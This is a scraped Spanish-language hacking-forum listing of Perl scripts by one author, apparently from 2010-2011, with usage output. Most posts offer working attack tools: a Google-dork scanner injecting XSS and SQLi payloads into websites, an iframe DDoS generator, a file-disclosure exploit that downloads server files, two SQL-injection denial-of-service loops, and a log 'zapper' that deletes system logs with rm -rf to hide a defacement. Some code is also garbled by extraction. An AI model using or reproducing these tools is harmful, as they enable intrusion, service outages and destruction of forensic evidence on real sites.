| |
|
421
|
Programación / Scripting / [Perl] Codificator version consola
|
en: 7 Octubre 2011, 01:16 am
|
Un simple codificador Soportes : - Hex encode/decode
- MD5 encode
- Base64 encode/decode
- ASCII encode/decode
- URL encode/decode
#!usr/bin/perl #Codificator version consola (C) Doddy Hackman 2011 #This tool encode in : # #Hex #MD5 #Base64 #ASCII #URL # # use Digest::MD5; use Digest::SHA1; use MIME::Base64; use URI::Escape; sub head { @@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @ @ @@@ @ @@@ @@@ @@@ @@@ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @@ @ @ @ @ @@@ @@@ @@ @ @ @ @ @@@ @@ @ @@ @@@ @ ); } head(); print "\n[+] Options\n\n"; 1 - MD5 encode 2 - Base64 encode 3 - Base64 decode 4 - Ascii encode 5 - Ascii decode 6 - Hex encode 7 - Hex decode 8 - URL encode 9 - URL decode 10 - Exit ); while(true) { print "\n\n[+] Option : "; if ($op eq 1) { chomp(my $string = <stdin>); print "\n\n[+] MD5 : ".Digest ::MD5->md5_hex($string)."\n\n"; } elsif ($op eq 2) { chomp(my $string = <stdin>); print "\n\n[+] Base64 : ".encode_base64 ($string); } elsif ($op eq 3) { chomp(my $string = <stdin>); print "\n\n[+] Base64 Decode : ".decode_base64 ($string)."\n"; } elsif ($op eq 4) { chomp(my $string = <stdin>); } elsif ($op eq 5) { chomp(my $string = <stdin>); } elsif ($op eq 6) { chomp(my $string = <stdin>); $hex = "0x"; } print "\n\n[+] Hex : ".$hex."\n"; } elsif ($op eq 7) { chomp(my $string = <stdin>); $string =~ s/^0x//; print "\n\n[+] Hex decode : ".$encode."\n"; } elsif ($op eq 8) { chomp(my $string = <stdin>); print "\n\n[+] URL Encode : ".uri_escape ($string)."\n"; } elsif ($op eq 9) { chomp(my $string = <stdin>); print "\n\n[+] URL Decode : ".uri_unescape ($string)."\n"; } elsif ($op eq 10) { copyright(); } else { print "[+] Write good stupid !\n"; } } sub copyright { print "\n-- == Doddy Hackman 2011 == --\n\n"; } # ¿The End ?
Ejemplo de uso
@@@ @ @ @ @ @
@ @ @ @ @
@ @@@ @@ @ @ @@@ @ @@@ @@@ @@@ @@@ @ @
@ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @@
@ @ @ @ @ @ @ @ @ @@@@ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @@ @ @ @ @ @ @ @@ @ @ @ @
@@@ @@@ @@ @ @ @ @ @@@ @@ @ @@ @@@ @
[+] Options
1 - MD5 encode
2 - Base64 encode
3 - Base64 decode
4 - Ascii encode
5 - Ascii decode
6 - Hex encode
7 - Hex decode
8 - URL encode
9 - URL decode
10 - Exit
[+] Option :
|
|
|
|
|
422
|
Programación / Scripting / [Perl] Paranoic Scan 0.9
|
en: 7 Octubre 2011, 01:15 am
|
La misma herramienta de siempre pero le agregue dos cosas nuevas - XSS POST & GET
- SQL POST & GET
#!usr/bin/perl #Paranoic Scan 0.9 Updated #(c)0ded by Doddy H 2010 # #Search in google with a dork #Scan type : # #XSS #Full Source Discloure #LFI #RFI #SQL GET & POST #MSSQL #Oracle #Jet Database #Find HTTP Options y Server nAME # # use LWP::UserAgent; use HTML::LinkExtor; use HTML::Form; use URI ::Split qw(uri_split ); use IO::Socket; my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); installer(); sta(); sub sta { sub head { @@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ @@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @ ); } &menu; sub menu { &head; print "[a] : Scan a File\n"; print "[b] : Search in google and scan the webs\n\n"; if ($op =~/a/ig) { print "\n[+] Wordlist : "; chomp(my $word = <STDIN>); my @paginas = repes(cortar(savewords($word))); my $option = &men; print "\n\n[+] Opening File\n"; scan($option,@paginas); } elsif ($op=~/b/ig) { chomp(my $dork = <STDIN>); chomp(my $pag = <STDIN>); my $option = &men; print "\n\n[+] Searching in google\n"; my @paginas = &google($dork,$pag); scan($option,@paginas); } else { &menu; } } sub scan { my ($option,@webs) = @_; print "\n\n[Status] : Scanning\n"; print "[Webs Count] : ".int(@webs)."\n\n\n"; for(@webs) { if ($option=~/S/ig) { scansql($_); } if ($option=~/L/ig) { lfi($_); } if ($option=~/R/ig) { rfi($_); } if ($option=~/F/ig) { fsd($_); } if ($option=~/X/ig) { scanxss($_); } if ($option=~/M/ig) { mssql($_); } if ($option=~/J/ig) { access($_); } if ($option=~/O/ig) { oracle($_); } if ($option=~/HT/ig) { http($_); } if ($option=~/A/ig) { scansql($_); scanxss($_); mssql($_); access($_); oracle($_); lfi($_); rfi($_); fsd($_); http($_); } } } print "\n\n[Status] : Finish\n"; &finish; } sub toma { return $nave->get($_[0])->content; } sub savefile { open (SAVE ,">>logs/".$_[0]); } sub finish { print "\n\n\n(C) Doddy Hackman 2010\n\n"; <STDIN>; sta(); } sub google { my($a,$b) = @_; for ($pages=10;$pages<=$b;$pages=$pages+10) { $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages"); my @links = get_links($code); for my $l(@links) { if ($l =~/webcache.googleusercontent.com/) { } } } for(@url) { if ($_ =~/cache:(.*?):(.*?)\+/) { } } my @founds = repes(cortar(@founds)); } sub http { my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $socket = IO::Socket::INET->new( PeerAddr=>$auth, PeerPort=>"80", Proto=>"tcp"); print $socket "OPTIONS / HTTP/1.0\r\n\r\n"; read $socket,$resultado,"1000"; if ($resultado=~/Server:(.*)/g) { my $server = $1; savefile("http-logs.txt","[+] Page : $auth"."\n"); savefile("http-logs.txt","[+] Server : ".$server."\n"); } if ($resultado=~/Allow: (.*)/g) { my $options = $1; savefile("http-logs.txt","[+] Options : ".$options."\n"); } $socket->close; } sub scanxss { my @testar = HTML::Form->parse(toma($page),"/"); my @botones_names; my @botones_values; my @orden; my @pa = ("<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",'"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>'); my @get_founds; my @post_founds; my @ordenuno; my @ordendos; my $contador_forms = 0; my $valor = "doddyhackman"; for my $test(@testar) { $contador_forms++; if ($test->method eq "POST") { my @inputs = $test->inputs; for my $in(@inputs) { if ($in->type eq "submit") { if ($in->name eq "") { push(@botones_names,"submit"); } push(@botones_names,$in->name); push(@botones_values,$in->value); } else { push(@ordenuno,$in->name,$pa[0]); push(@ordendos,$in->name,$pa[1]); }} for my $n(0..int(@botones_names)-1) { my @preuno = @ordenuno; my @predos = @ordendos; push(@preuno,$botones_names[$n],$botones_values[$n]); push(@predos,$botones_names[$n],$botones_values[$n]); my $codeuno = $nave->post($page,\@preuno)->content; my $codedos = $nave->post($page,\@predos)->content; if ($codeuno=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig or $codedos=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig) { if ($test->attr(name) eq "" or $test->attr(name) eq " ") { push(@post_founds,$contador_forms); } else { push(@post_founds,$test->attr(name )); }}} } else { #Fin de metodo POST my @inputs = $test->inputs; for my $in(@inputs) { if ($in->type eq "submit") { if ($in->name eq "") { push(@botones_names,"submit"); } push(@botones_names,$in->name); push(@botones_values,$in->value); } else { $orden.=''.$in->name.'='.$valor.'&'; }} for my $n(0..int(@botones_names)-1) { my $partedos = "&".$botones_names[$n]."=".$botones_values[$n]; my $final = $orden.$partedos; for my $strin(@pa) { $final=~s/doddyhackman /$strin/; $code = toma($page."?".$final); my $strin = "\Q$strin\E"; if ($code=~/$strin/) { push(@get_founds,$page."?".$final); }}}}} my @get_founds = repes(@get_founds); if (int(@get_founds) ne 0) { for(@get_founds) { savefile("xss-logs.txt","[+] XSS Found : $_"); print "[+] XSS Found : $_\n\a"; }} my @post_founds = repes(@post_founds); if (int(@post_founds) ne 0) { for my $t(@post_founds) { if ($t =~/^\d+$/) { savefile("xss-logs.txt","[+] XSS : Form $t in $page"); print "[+] XSS : Form $t in $page\n\a"; }}}} sub scansql { my $copia = $page; $co = toma($page."'"); if ($co=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $co=~ /mysql_free_result/ig || $co =~ /mysql_fetch_assoc/ig ||$co =~ /mysql_num_rows/ig || $co =~ /mysql_fetch_array/ig || $co =~/mysql_fetch_assoc/ig || $co=~/mysql_query/ig || $co=~/mysql_free_result/ig || $co=~/equivocado en su sintax/ig || $co=~/You have an error in your SQL syntax/ig || $co=~/Call to undefined function/ig) { savefile("sql-logs.txt","[+] SQL : $page"); print "[+] SQLI : $page\a\n"; } if ($page=~/(.*)\?(.*)/) { my $page = $1; my @testar = HTML::Form->parse(toma($page),"/"); my @botones_names; my @botones_values; my @orden; my @get_founds; my @post_founds; my @ordenuno; my @ordendos; my $contador_forms = 0; my $valor = "doddyhackman"; for my $test(@testar) { $contador_forms++; if ($test->method eq "POST") { my @inputs = $test->inputs; for my $in(@inputs) { if ($in->type eq "submit") { if ($in->name eq "") { push(@botones_names,"submit"); } push(@botones_names,$in->name); push(@botones_values,$in->value); } else { push(@ordenuno,$in->name,"'"); }} for my $n(0..int(@botones_names)-1) { my @preuno = @ordenuno; push(@preuno,$botones_names[$n],$botones_values[$n]); my $code = $nave->post($page,\@preuno)->content; if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) { if ($test->attr(name) eq "" or $test->attr(name) eq " ") { push(@post_founds,$contador_forms); } else { push(@post_founds,$test->attr(name )); }}}} my @post_founds = repes(@post_founds); if (int(@post_founds) ne 0) { for my $t(@post_founds) { if ($t =~/^\d+$/) { savefile("sql-logs.txt","[+] SQLI : Form $t in $page"); print "[+] SQLI : Form $t in $page\n\a"; }}}}}} sub access { $code1 = toma($page."'"); if ($code1=~/Microsoft JET Database/ig or $code1=~/ODBC Microsoft Access Driver/ig) { print "[+] Jet DB : $page\a\n"; savefile("jetdb-logs.txt",$page); } } sub mssql { $code1 = toma($page."'"); if ($code1=~/ODBC SQL Server Driver/ig) { print "[+] MSSQL : $page\a\n"; savefile("mssql-logs.txt",$page); } } sub oracle { $code1 = toma($page."'"); if ($code1=~/Microsoft OLE DB Provider for Oracle/ig) { print "[+] Oracle : $page\a\n"; savefile("oracle-logs.txt",$page); } } sub rfi { $code1 = toma($page."http:/www.supertangas.com/"); if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD print "[+] RFI : $page\a\n"; savefile("rfi-logs.txt",$page); }} sub lfi { $code1 = toma($page."'"); if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) { print "[+] LFI : $page\a\n"; savefile("lfi-logs.txt",$page); }} sub fsd { my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if ($path=~/\/(.*)$/) { my $me = $1; $code1 = toma($page.$me); if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) { print "[+] Full Source Discloure : $page\a\n"; savefile("fpd-logs.txt",$page); }}} sub repes { my @limpio; foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } } sub savewords { @words = <FILE>; for(@words) { } } sub men { print "\n\n[+] Scan Type : \n\n"; print "[J] : Jet Database\n"; print "[F] : Full Source Discloure\n"; print "[HT] : HTTP Information\n"; chomp(my $option = <STDIN>); } sub cortar { my @nuevo; for(@_) { if ($_ =~/=/) { push(@nuevo,@tengo[0]."="); } else { }} } sub get_links { $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]); sub agarrar { my ($a,%b) = @_; } } sub installer { unless (-d "logs/") { } } # ¿ The End ?
Ejemplo de uso
@@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@
@ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @
@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @
@@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @
@ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @
@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@
@@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @
[a] : Scan a File
[b] : Search in google and scan the webs
[option] :
|
|
|
|
|
423
|
Programación / Scripting / [Perl] Iframe DDos Attack Tool
|
en: 7 Octubre 2011, 01:15 am
|
Un simple poc para la los ataques de denegacion de servicio usando iframes. #!usr/bin/perl #Iframe DDos Attack Tool (C) Doddy Hackman 2011 use Cwd; installer(); sub head { print "\n\n-- == Iframe DDos Attack Tool == --\n\n"; } sub copyright { print "\n\n -- == Doddy Hackman 2011\n\n"; } sub sintax { print "\n[+] sintax : $0 <target> <count file> <count iframe>\n"; } sub start { my ($target,$files,$iframe) = @_; print "\n[+] Starting the party\n\n"; print "[+] Generating files and iframes\n"; print "\n[+] All Save in ".getcwd ()."/files/"."\n"; for my $can(1..$files) { open (POC ,">>files/index".$can.".html"); for my $tx(1..$iframe) { print POC '<iframe src="'.$target.'" width="3" height="3"></iframe><br>'; } } } head(); unless(@ARGV > 2) { sintax(); } else { start($ARGV[0],$ARGV[1],$ARGV[2]); } copyright(); sub installer { unless (-d "files/") { }} # ¿ The End ?
Ejemplo de uso
C:\Documents and Settings\Administrador\Escritorio\Leviatan\Hacking\WarFactoy II
Finales\poc iframe>poc.pl "pepo.com" 4 4
-- == Iframe DDos Attack Tool == --
[+] Starting the party
[+] Generating files and iframes
[+] All Save in C:/Documents and Settings/Administrador/Escritorio/Leviatan/Hack
ing/WarFactoy II Finales/poc iframe/files/
-- == Doddy Hackman 2011
|
|
|
|
|
424
|
Programación / Scripting / [Perl] Mysql Manager
|
en: 7 Octubre 2011, 01:14 am
|
Un simple mysql manager , un triste intento de imitacion al comando mysql pero bueno.... #!usr/bin/perl #Mysql Manager (C) Doddy Hackman 2011 #ppm install http://www.bribes.org/perl/ppm/DBI.ppd use DBI; sub head { print "\n\n -- == Mysql Manager == --\n\n"; } sub copyright { print "\n\n-- == (C) Doddy Hackman 2011 == --\n\n"; } sub sintax { print "\n[+] Sintax : $0 <host> <user> <pass>\n"; } head(); unless (@ARGV > 2) { sintax(); } else { enter($ARGV[0],$ARGV[1],$ARGV[2]); } copyright(); sub enter { print "\n[+] Connecting to the server\n"; $info = "dbi:mysql::".$_[0].":3306"; if (my $enter = DBI->connect($info,$_[1],$_[2],{PrintError=>0})) { print "\n[+] Enter in the database"; while(1) { print "\n\n\n[+] Query : "; if ($ac eq "exit") { $enter->disconnect; print "\n\n[+] Closing connection\n\n"; copyright(); } $re = $enter->prepare($ac); $re->execute(); my $total = $re->rows(); my @columnas = @{$re->{NAME}}; if ($total eq "-1") { print "\n\n[-] Query Error\n"; next; } else { print "\n\n[+] Result of the query\n"; if ($total eq 0) { print "\n\n[+] Not rows returned\n\n"; } else { print "\n\n[+] Rows returned : ".$total."\n\n\n"; for(@columnas) { } while (@row = $re->fetchrow_array) { for(@row) { } }}}} } else { print "\n[-] Error connecting\n"; }} # ¿ The End ?
Un ejemplo de uso
C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
mysqlman>manager.PL localhost root ""
-- == Mysql Manager == --
[+] Connecting to the server
[+] Enter in the database
[+] Query : show databases
[+] Result of the query
[+] Rows returned : 6
Database
information_schema
cdcol
hackman
mysql
phpmyadmin
test
[+] Query : exit
[+] Closing connection
-- == (C) Doddy Hackman 2011 == --
|
|
|
|
|
425
|
Programación / Scripting / [Perl] FSD Exploit Manager
|
en: 7 Octubre 2011, 01:14 am
|
Un simple exploit que nos ayuda a explotar la vulnerabilidad Full Source Discloure de una forma muy relajante , lo bueno de este programa es que guarda todo lo descargado en una carpeta creada por el programa mismo. Ademas detecta automaticamente Full Path Discloure para conocer las rutas necesarias para descargar archivos. #!usr/bin/perl #FSD Exploit Manager (C) Doddy Hackman 2011 use LWP::UserAgent; use URI ::Split qw(uri_split ); use File::Basename; my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); $SIG{INT} = \&adios; head(); if($ARGV[0]) { ver($ARGV[0]); } else { sintax(); } copyright(); sub ver { print "\n[+] Target : ".$page."\n\n"; my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if ($path=~/\/(.*)$/) { my $me = $1; $code1 = toma($page.$me); if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) { print "[+] Full Source Discloure Detect\a\n"; $code2 = toma($page."'"); if ($code2=~/No such file or directory in <b>(.*)<\/b> on line/) { print "\n[+] Full Path Dislocure Detect : ".$1."\n"; } installer(); while(1) { $SIG{INT} = \&adios; chomp(my $url = <stdin>); if (download($page.$url,"fsdlogs/".basename($url))) { print "\n\n[+] File Downloaded\n"; system("start fsdlogs/".basename ($url)); } } } else { print "[-] Web not vulnerable\n\n"; } } } sub adios { print "\n\n[+] Good Bye\n"; copyright(); } sub head { print "\n\n-- == FSD Exploit Manager == --\n\n"; } sub copyright { print "\n\n-- == (C) Doddy Hackman 2011 == --\n\n"; } sub sintax { print "\n[+] Sintax : $0 <page>\n"; } sub toma { return $nave->get($_[0])->content; } sub download { if ($nave->mirror($_[0],$_[1])) { if (-f $_[1]) { }}} sub installer { unless (-d "fsdlogs/") { }} # ¿ The End ?
Un ejemplo de uso C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
FSD Exploit Manager>fsd.pl http://localhost/down.php?down=
-- == FSD Exploit Manager == --
[+] Target : http://localhost/down.php?down=
[+] Full Source Discloure Detect
[+] Full Path Dislocure Detect : C:\xampp\htdocs\down.php
url>c:/aca.txt
[+] File Downloaded
url>c:/aca.txt
[+] File Downloaded
[+] Good Bye
-- == (C) Doddy Hackman 2011 == --
|
|
|
|
|
426
|
Programación / Scripting / [Perl] SQLi DOS 0.1
|
en: 7 Octubre 2011, 01:13 am
|
Un simple Dos para SQLi #!usr/bin/perl #SQLi Dos 0.1 (C) Doddy Hackman 2011 use LWP::UserAgent; my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); if($ARGV[0]) { now($ARGV[0]); } else { sintax(); } copyright(); sub now { print "\n[+] Target : ".$_[0]."\n"; print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n"; while(true) { $SIG{INT} = \&adios; $code = toma($_[0]."zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz"); unless($code->is_success) { copyright(); }}} sub adios { print "\n[+] Stoping attack\n"; copyright(); } sub head { print "\n\n-- == SQLI Dos 0.1 == --\n\n"; } sub copyright { print "\n\n-- == (C) Doddy Hackman 2011 == --\n\n"; } sub sintax { print "\n[+] Sintax : $0 <page>\n"; } sub toma { } # ¿ The End ?
Ejemplo de uso C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
SQLI Dos>sqlidos.pl http://localhost/sql.php?id=1
-- == SQLI Dos 0.1 == --
[+] Target : http://localhost/sql.php?id=1
[+] Starting the attack
[+] Info : control+c for stop attack
[+] Stoping attack
-- == (C) Doddy Hackman 2011 == --
|
|
|
|
|
427
|
Programación / Scripting / [Perl] SQLi Dos 0.2
|
en: 7 Octubre 2011, 01:12 am
|
El mismo Dos para SQLi per esta vez usando benchmark() #!usr/bin/perl #SQLi Dos 0.2 (C) Doddy Hackman 2011 use LWP::UserAgent; my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); if($ARGV[0]) { now($ARGV[0]); } else { sintax(); } copyright(); sub now { print "\n[+] Target : ".$_[0]."\n"; print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n"; while(true) { $SIG{INT} = \&adios; $code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))"); unless($code->is_success) { copyright(); }}} sub adios { print "\n[+] Stoping attack\n"; copyright(); } sub head { print "\n\n-- == SQLI Dos 0.2 == --\n\n"; } sub copyright { print "\n\n-- == (C) Doddy Hackman 2011 == --\n\n"; } sub sintax { print "\n[+] Sintax : $0 <page>\n"; } sub toma { } # ¿ The End ?
Ejemplo de uso
C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
SQLI Dos>sqlidos.pl http://localhost/sql.php?id=1
-- == SQLI Dos 0.1 == --
[+] Target : http://localhost/sql.php?id=1
[+] Starting the attack
[+] Info : control+c for stop attack
[+] Web Off
-- == (C) Doddy Hackman 2011 == --
|
|
|
|
|
428
|
Programación / Scripting / [Perl] Zapper for Linux
|
en: 29 Julio 2010, 23:20 pm
|
Bueno ,esta herramienta no tiene un nombre chevere pero bueno , con esta herramienta pueden borrar sus huellas despues de hacer un masivo deface en una pobre web. Recuerden que primero deben darle permisos y despues ejecutarlo. #Zapper
#By Doddy Hackman
@paths = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var
/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth");
@comandos = ('find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name *.log -exec rm -rf {} \;');
print "[+] Zapping the logs\n";
for (@paths) {
if (-f $_) { system("rm -rf $_"); }
}
for (@comandos) {system($_);}
print "[+] All the logs are erased\n";
#The end
|
|
|
|
|
429
|
Programación / Scripting / [Perl] Bones X
|
en: 29 Julio 2010, 23:18 pm
|
Bueno , BonesX es una herramienta que los ayudara en el momento que quieran usar una consola ms dos y el admin la haya borrado. Su uso no es muy dificil asi que creo que podran usarla. Ademas les ofrece informacion de la maquina actual como : IP , SO , nombre de usuario y grupo del usuario. #Bones X
#Author = Doddy Hackman
#Very easy console the using if the admin delete the ms-dos original
use Win32::IPConfig;
use Net::Nslookup;
use Color::Output;
Color::Output::Init;
&datos;
sub datos {
system ("title Bones X");
system ("cls");
$ip = nslookup(qtype => "A", domain => "localhost");
system ("prompt Doddy Hackman@$ip.com:");
$so = $^O;
$login = Win32::LoginName();
$domain = Win32::DomainName();
cprint "\x0313
Program: Bones X
Author : Doddy Hackman
\x0x30";
cprint "\x033
Your IP : $ip
SO : $so
Login : $login
Group : $domain
\n\x033";
}
inicio:;
cprint "\x037";
print "C:\\l33t\\";
print "D00d1>";
$cmd=<STDIN>;
chomp $cmd;
cprint "\n\x037";
if ($cmd eq "exit") {
exit 1;
}
elsif ($cmd eq "cls") {&datos;goto inicio}
else {
cprint "\0035";
print "\n";
system ($cmd);
cprint "\n\n\n";
goto inicio ,
}
|
|
|
|
|
430
|
Programación / Scripting / [Perl] NightVision
|
en: 29 Julio 2010, 23:16 pm
|
Bueno ,esta herramienta llamada NightVision , les servira para poder ver sus propios puertos , despues tienen un menu el cual les permitira cerrar el puerto que les venga en gana. Esta herramienta puede servir cuando el administrador de un cyber (seguro) bloquea el administrador de tareas. #Program : NightVision
#Author : Doddy Hackman
#Module neccesary
#ppm install http://trouchelle.com/ppm/Win32-Process-List.ppd
use Win32::Process::List;
use Color::Output;
Color::Output::Init;
use Win32::Process;
&clean;&options;
sub clean {
system 'cls';
system 'title NightVision';
cprint "\x0313";
print "\nNightVision 0.1\nCopyright 2010 Doddy Hackman\nMail:doddy-hackman[at]hotmail[com]\n\n";
cprint "\x0x30\n\n";
my $new = Win32::Process::List->new();
my %process = $new->GetProcesses();
chomp %process;
$limit = "";
for my $pid (keys %process) {
if ($pid ne "") {$limit++};
push (@procer,$process{$pid});
push (@pids,$pid);
chomp (@procer,@pids);
}
$limit--;
for my $n(1..$limit) {
cprint "\x037";
print "Process Number: [$n]\tProcess name : $procer[$n]\tPID : $pids[$n]\n";
cprint "\x037";
}}
sub options {
cprint "\0035";
print "\n\nOptions :\n\n[a] : Close a process\n[b] Clean Console\n[c] Exit\n\n\n[+] Write you options : ";
$t = <STDIN>;
chomp $t;
if ($t eq "a") { &close;} elsif ($t eq "b") {&load;&clean;&options;} elsif ($t eq "c") {exit 1;} else {&load;&clean;&options;}}
sub load { system($0); }
sub close {
print "\n[+] Write the number of the process : ";
$numb = <STDIN>;
chomp $numb;
Win32::Process::KillProcess(@pids[$numb],@procer[$numb]);
print "\n\n[+] OK , Process Closed\n\n";&load;&clean;&options;
}
|
|
|
|
|
|
| |
|
Mostrar Temas